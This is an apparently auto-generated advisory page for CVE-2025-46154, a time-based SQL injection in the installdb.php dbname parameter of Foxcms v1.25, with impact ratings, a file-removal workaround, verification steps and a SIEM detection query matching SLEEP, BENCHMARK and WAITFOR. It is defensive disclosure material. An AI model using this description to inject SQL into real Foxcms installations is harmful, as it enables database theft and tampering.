CVE-2025-46154 – Foxcms v1.25 contains a SQL time-based injectio... (How to Fix)

Q: What is the severity of CVE-2025-46154?

CVE-2025-46154 has a CVSS score of 8.4 (HIGH). Foxcms v1.25 contains a SQL time-based injection vulnerability in the installdb.php file's dbname parameter. This allows attackers to execute arbitrary SQL queries by manipulating database connection requests during installation. Only systems running the vulnerable Foxcms version are affected.

📋 TL;DR

Foxcms v1.25 contains a SQL time-based injection vulnerability in the installdb.php file's dbname parameter. This allows attackers to execute arbitrary SQL queries by manipulating database connection requests during installation. Only systems running the vulnerable Foxcms version are affected.

💻 Affected Systems

Products:

Foxcms

Versions: v1.25

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in the installation script, affecting fresh installations and potentially systems where installation files weren't removed.

📦 What is this software?

Foxcms by Foxcms

View all CVEs affecting Foxcms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise leading to data theft, data manipulation, or potential remote code execution through database functions.

🟠

Likely Case

Database information disclosure, data extraction, and potential privilege escalation within the database.

🟢

If Mitigated

Limited impact with proper input validation and database permission restrictions in place.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

SQL time-based injection requires no authentication and has public proof-of-concept available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Unknown

Restart Required: No

Instructions:

No official patch available. Remove or restrict access to installdb.php after installation completes.

🔧 Temporary Workarounds

Remove installation files

linux

Delete or restrict access to the vulnerable installdb.php file after installation

rm /path/to/foxcms/installdb.php
chmod 000 /path/to/foxcms/installdb.php

Input validation

all

Add parameter validation to dbname parameter in installdb.php

🧯 If You Can't Patch

Remove or disable the installdb.php file after installation
Implement web application firewall rules to block SQL injection patterns

🔍 How to Verify

Check if Vulnerable:

Check if installdb.php exists and is accessible. Test with time-based SQL injection payloads against the dbname parameter.

Check Version:

Check Foxcms version in configuration files or admin panel

Verify Fix Applied:

Confirm installdb.php is removed or inaccessible. Test with SQL injection payloads that should be blocked.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to installdb.php with SQL keywords
Long response times from installdb.php requests

Network Indicators:

HTTP POST requests to installdb.php containing SQL syntax like SLEEP(), BENCHMARK(), or WAITFOR

SIEM Query:

source="web_logs" AND uri="/installdb.php" AND (request_body CONTAINS "SLEEP" OR request_body CONTAINS "BENCHMARK" OR request_body CONTAINS "WAITFOR")

📊 Metadata

CVE ID: CVE-2025-46154

CVSS v3 Score: 8.4 (HIGH)

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-89

EPSS Score: 0.03% exploit probability (7th percentile)

Published: June 3, 2025

Last Updated: June 9, 2025

🔗 References

https://github.com/Yf3te/CVE/blob/main/CVE-2025-46154 Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-46154, you might also want to check these: